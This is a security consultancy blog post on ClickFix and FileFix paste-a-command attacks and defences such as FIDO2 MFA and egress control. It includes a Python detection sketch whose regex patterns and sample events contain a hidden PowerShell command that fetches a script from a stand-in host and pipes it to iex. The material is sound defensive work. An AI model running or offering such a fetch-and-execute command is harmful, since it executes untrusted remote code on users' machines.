
The "Ctrl+V" Compromise

Why Your Employees are Pasting the Keys to the Kingdom

As security consultants, we've spent years telling clients to "think before you click". But in the last 12 months, the threat landscape has shifted so fundamentally that this advice is becoming dangerously obsolete. We are no longer just fighting malicious links; we are fighting a new breed of social engineering that turns your users’ own administrative habits against them.

The trend is called ClickFix, and its newer sibling, FileFix. These aren't just clever tricks; they are AI-accelerated campaigns that bypass your technical controls by manipulating the person at the keyboard into executing the attack themselves.

The Mechanics of the Shell Based Attack

Traditional phishing relies on a user downloading a file or visiting a credential harvesting site. ClickFix is different. It relies on User Execution (MITRE ATT&CK T1204) by instructing the victim to paste a malicious PowerShell command directly into the operating system.

The workflow typically looks like this:

  • The Lure: A user visits a compromised site or receives a highly convincing AI generated email (often appearing as a "Fix" for a browser error or a document loading issue).
  • The Instruction: The site presents a popup with a "Fix" button. Clicking it doesn't download a virus; instead, it copies a malicious script to the user's clipboard.
  • The Shell Paste: The user is then instructed to press a keyboard shortcut and paste the code.
    • ClickFix: Directs users to the Run Dialog (Win + R).
    • FileFix: Directs users to the File Explorer address bar (CTRL + L or ALT + D).

By the time the user hits "Enter", they have manually bypassed your EDR’s browser protections and executed an infostealer or a Remote Access Trojan (RAT) directly in the OS shell.

Why Traditional Training is Failing

We have to be honest: standard security awareness training is no longer a match for AI driven deception.

Recent data shows that phishing attempts crafted by Large Language Models (LLMs) achieve a 54% clickthrough rate, compared to just 12% for human generated attempts. That is a 4.5x increase in effectiveness. Adversaries are using AI to remove the tell-tale signs we’ve taught employees to look for: the poor grammar, the clunky formatting, and the suspicious URLs are gone.

When a ClickFix prompt looks identical to a legitimate Windows system message, and the "fix" involves a common IT troubleshooting step (like using the Run command), even your most tech savvy employees can be deceived.

Moving to Phishing Resistant MFA

At Cyber Context, our commitment to Integrity and Excellence means we don't just point out the problem; we provide the definitive shield.

If we cannot "patch" every human, we must make the consequences of their mistakes negligible. This is why we advocate for phishing resistant Multi-Factor Authentication (MFA) - specifically FIDO2 based hardware keys - as a non-negotiable layer of defence.

Unlike traditional MFA (SMS codes or push notifications), which can be intercepted or "fatigued," phishing resistant MFA creates a cryptographic link between the user’s device and the specific service they are accessing. Even if an employee is tricked into pasting a script or entering a password, the attacker cannot complete the authentication without the physical hardware key.

Studies show that implementing phishing resistant MFA can block over 99% of identity based attacks.

The Consultant’s Verdict

The rise of ClickFix and FileFix proves that adversaries have mastered the "human shell." They are evolving so rapidly that legacy training simply cannot keep up. It is vital that you also move at Pace to ensure your controls are in place to detect and prevent such attacks.

To show true Care for your employees and your digital estate, you must move beyond the "checklist" of awareness training. To achieve a true defence-in-depth strategy, we recommend fortifying the environment around your users’ identities. This begins with implementing a strong Role-Based Access Control (RBAC) model and the principle of least privilege across your entire technology estate. By limiting the inherent permissions of compromised accounts, you dramatically reduce an attacker's ability to move laterally and cause damage (the blast radius).

Secondly, you need to provide your users with tools like hardware-backed MFA that protect them even when a highly sophisticated AI manages to win their trust.

Third, establishing observability and control over egress traffic is essential. Leverage modern SASE (Secure Access Service Edge) solutions with AI-driven detection and categorisation to proactively prevent users from accessing suspicious websites known to, or likely to, initiate ClickFix or FileFix attacks, and crucially block any subsequent traffic to a command-and-control (C2) server.

Finally, maintain continuous monitoring of all activity on your endpoints and egress points. Promptly detecting suspicious behaviour such as unusual process execution or anomalous network connections is your final opportunity to intercept the attack chain and secure your digital crown jewels.
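As an added example (not code from this article or any vendor product), the sketch below shows what "unusual process execution" can look like for the Run dialog and File Explorer paste steps described earlier: a script host launched by an interactive parent, scored by command-line traits. The field names follow Sysmon Event ID 1; the parent list, trait patterns, threshold and sample events are assumptions constructed for illustration.

```python
import re
from ntpath import basename  # parses Windows paths on any OS

# Assumed heuristics, not taken from the article; tune for your estate.
# Browsers are listed because a FileFix Explorer window is assumed to be a
# file-picker dialog hosted by the browser process.
INTERACTIVE_PARENTS = {"explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}
CMDLINE_TRAITS = {
    "encoded_command": re.compile(r"\s-e(nc\w*)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "hidden_window": re.compile(r"-w(indowstyle)?\s+h(idden)?\b", re.I),
    "remote_fetch": re.compile(r"https?://|invoke-webrequest|\biwr\b", re.I),
    "dynamic_eval": re.compile(r"invoke-expression|\biex\b", re.I),
}

def triage(event):
    """Score one process-creation event (Sysmon Event ID 1 field names)."""
    parent = basename(event["ParentImage"]).lower()
    child = basename(event["Image"]).lower()
    if parent not in INTERACTIVE_PARENTS or child not in SCRIPT_HOSTS:
        return 0, []
    reasons = [f"{parent} -> {child}"]  # lineage alone scores 1
    reasons += [name for name, rx in CMDLINE_TRAITS.items()
                if rx.search(event["CommandLine"])]
    return len(reasons), reasons

def alerts(events, threshold=3):
    """Return (host, reasons) for events scoring at or above the threshold."""
    hits = []
    for event in events:
        score, reasons = triage(event)
        if score >= threshold:
            hits.append((event["Computer"], reasons))
    return hits

def ev(host, parent, image, cmd):
    return {"Computer": host, "ParentImage": parent, "Image": image, "CommandLine": cmd}

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [  # constructed for illustration, not real telemetry
    ev("WS-01", r"C:\Windows\explorer.exe", PS,
       'powershell.exe -w hidden -c "iwr https://example.invalid/fix.txt | iex"'),
    ev("WS-02", r"C:\Windows\explorer.exe", PS, "powershell.exe"),
    ev("WS-03", r"C:\Program Files\Google\Chrome\Application\chrome.exe",
       r"C:\Windows\System32\cmd.exe", "cmd.exe /c powershell -w h -e " + "QUJD" * 6),
    ev("SRV-01", r"C:\Windows\System32\services.exe", PS,
       r"powershell.exe -w hidden -File C:\Scripts\backup.ps1"),
]
```

An administrator opening a plain shell from the Run dialog (WS-02) scores only on lineage and stays below the threshold, which keeps routine IT troubleshooting from flooding the alert queue.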

Is your organisation still relying on "don't click" as its primary defence? Let’s talk about modernising your network and identity strategy for the AI era.
